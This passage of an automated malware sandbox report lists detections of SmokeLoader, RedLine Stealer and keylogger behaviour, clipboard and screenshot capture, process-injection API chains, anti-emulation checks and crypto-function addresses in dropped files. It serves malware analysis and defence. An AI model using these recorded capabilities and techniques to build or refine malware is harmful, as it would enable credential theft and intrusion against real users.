Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53076 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53077 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53082 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.8:53085 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:53086 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 37.27.34.12:443 -> 192.168.2.8:53087 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_0042EAB0

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\5876.exe

Code function: 7_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

7_2_0042EAB0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\5876.exe

7_2_0042EC90

Yara detected Keylogger Generic

Source: Yara match	File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401615
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401658
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401620
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401524
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040162D
Source: C:\Users\user\Desktop\xvJv1BpknZ.exe	Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401635
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401615
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401658
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower,	6_2_00403406
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401620
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401524
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_0040162D
Source: C:\Users\user\AppData\Roaming\etrtabd	Code function: 6_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_00401635
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_04279B10 NtProtectVirtualMemory,NtProtectVirtualMemory,	11_2_04279B10
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	11_2_0427A4F0
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_04279850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	11_2_04279850

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00427353	7_2_00427353
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00420880	7_2_00420880
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00404970	7_2_00404970
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0041FD10	7_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0043B050	7_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00426174	7_2_00426174
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004061F0	7_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00426284	7_2_00426284
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004223B8	7_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00405440	7_2_00405440
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0040F400	7_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004164D2	7_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00433480	7_2_00433480
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00403570	7_2_00403570
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00421580	7_2_00421580
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004016E0	7_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004067B0	7_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_004089A0	7_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00421C71	7_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00425CEE	7_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00440D36	7_2_00440D36
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0043AD30	7_2_0043AD30
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00407DF0	7_2_00407DF0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00404EF0	7_2_00404EF0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00435EB0	7_2_00435EB0
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_00403F80	7_2_00403F80
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02121267	7_2_02121267
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0215B2B7	7_2_0215B2B7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021463DB	7_2_021463DB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02128057	7_2_02128057
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02142067	7_2_02142067
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02156117	7_2_02156117
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02125157	7_2_02125157
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021241E7	7_2_021241E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0212F667	7_2_0212F667
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021256A7	7_2_021256A7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021536E7	7_2_021536E7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02136739	7_2_02136739
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021237D7	7_2_021237D7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02126457	7_2_02126457
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021464EB	7_2_021464EB
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_021475BA	7_2_021475BA
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02126A17	7_2_02126A17
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02140AE7	7_2_02140AE7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02124BD7	7_2_02124BD7
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02145F55	7_2_02145F55
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_0215AF97	7_2_0215AF97
Source: C:\Users\user\AppData\Local\Temp\5876.exe	Code function: 7_2_02128C07	7_2_02128C07
Source: C:\Users\user\AppData\Local\Temp\EE6.exe	Code function: 11_2_0427AB10	11_2_0427AB10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E8D20	12_2_6D1E8D20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D18AD50	12_2_6D18AD50
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12ED70	12_2_6D12ED70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F6D90	12_2_6D0F6D90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D064DB0	12_2_6D064DB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1ECDC0	12_2_6D1ECDC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D126C00	12_2_6D126C00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13AC30	12_2_6D13AC30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06AC60	12_2_6D06AC60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D05ECC0	12_2_6D05ECC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BECD0	12_2_6D0BECD0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D066F10	12_2_6D066F10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A0F20	12_2_6D1A0F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0CEF40	12_2_6D0CEF40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D122F70	12_2_6D122F70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A8FB0	12_2_6D1A8FB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06EFB0	12_2_6D06EFB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13EFF0	12_2_6D13EFF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D060FE0	12_2_6D060FE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D140E20	12_2_6D140E20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FEE70	12_2_6D0FEE70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E6E90	12_2_6D0E6E90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06AEC0	12_2_6D06AEC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D100EC0	12_2_6D100EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B6900	12_2_6D0B6900
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D098960	12_2_6D098960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1209B0	12_2_6D1209B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F09A0	12_2_6D0F09A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11A9A0	12_2_6D11A9A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D17C9E0	12_2_6D17C9E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0949F0	12_2_6D0949F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B0820	12_2_6D0B0820
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0EA820	12_2_6D0EA820
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D134840	12_2_6D134840
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1668E0	12_2_6D1668E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D100BA0	12_2_6D100BA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D166BE0	12_2_6D166BE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D10EA00	12_2_6D10EA00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D118A30	12_2_6D118A30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0DCA70	12_2_6D0DCA70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0DEA80	12_2_6D0DEA80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A8550	12_2_6D1A8550
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B8540	12_2_6D0B8540
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D164540	12_2_6D164540
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D100570	12_2_6D100570
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C2560	12_2_6D0C2560
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0545B0	12_2_6D0545B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12A5E0	12_2_6D12A5E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0EE5F0	12_2_6D0EE5F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C4420	12_2_6D0C4420
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0EA430	12_2_6D0EA430
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D078460	12_2_6D078460
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D18A480	12_2_6D18A480
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0A64D0	12_2_6D0A64D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FA4D0	12_2_6D0FA4D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E0700	12_2_6D0E0700
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D08A7D0	12_2_6D08A7D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BC650	12_2_6D0BC650
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0846D0	12_2_6D0846D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BE6E0	12_2_6D0BE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FE6E0	12_2_6D0FE6E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D144130	12_2_6D144130
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0D6130	12_2_6D0D6130
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C8140	12_2_6D0C8140
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0601E0	12_2_6D0601E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D128010	12_2_6D128010
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12C000	12_2_6D12C000
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0AE070	12_2_6D0AE070
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D058090	12_2_6D058090
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13C0B0	12_2_6D13C0B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0700B0	12_2_6D0700B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0D2320	12_2_6D0D2320
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D068340	12_2_6D068340
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A2370	12_2_6D1A2370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D062370	12_2_6D062370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D17C360	12_2_6D17C360
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F6370	12_2_6D0F6370
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0923A0	12_2_6D0923A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BE3B0	12_2_6D0BE3B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B43E0	12_2_6D0B43E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12A210	12_2_6D12A210
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D138220	12_2_6D138220
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F8250	12_2_6D0F8250
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0E8260	12_2_6D0E8260
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D12E2B0	12_2_6D12E2B0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1322A0	12_2_6D1322A0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E62C0	12_2_6D1E62C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C3D00	12_2_6D0C3D00
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D053D80	12_2_6D053D80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1A9D90	12_2_6D1A9D90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D131DC0	12_2_6D131DC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D071C30	12_2_6D071C30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D063C40	12_2_6D063C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D189C40	12_2_6D189C40
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FFC80	12_2_6D0FFC80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D19DCD0	12_2_6D19DCD0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D121CE0	12_2_6D121CE0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D095F20	12_2_6D095F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D055F30	12_2_6D055F30
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1B7F20	12_2_6D1B7F20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D081F90	12_2_6D081F90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D17DFC0	12_2_6D17DFC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E3FC0	12_2_6D1E3FC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D10BFF0	12_2_6D10BFF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D16DE10	12_2_6D16DE10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1BBE70	12_2_6D1BBE70
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1E5E60	12_2_6D1E5E60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D083EC0	12_2_6D083EC0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1AF900	12_2_6D1AF900
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D115920	12_2_6D115920
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0DF960	12_2_6D0DF960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D11D960	12_2_6D11D960
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D131990	12_2_6D131990
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D071980	12_2_6D071980
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F99C0	12_2_6D0F99C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0999D0	12_2_6D0999D0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0C59F0	12_2_6D0C59F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0F79F0	12_2_6D0F79F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0BD810	12_2_6D0BD810
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0FF8C0	12_2_6D0FF8C0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13F8F0	12_2_6D13F8F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D06D8E0	12_2_6D06D8E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0938E0	12_2_6D0938E0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D1BB8F0	12_2_6D1BB8F0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0ABB20	12_2_6D0ABB20
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D13FB60	12_2_6D13FB60
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D145B90	12_2_6D145B90
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D051B80	12_2_6D051B80
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D129BB0	12_2_6D129BB0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0B9BA0	12_2_6D0B9BA0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D0A7BF0	12_2_6D0A7BF0
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D101A10	12_2_6D101A10
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	Code function: 12_2_6D09FA10	12_2_6D09FA10
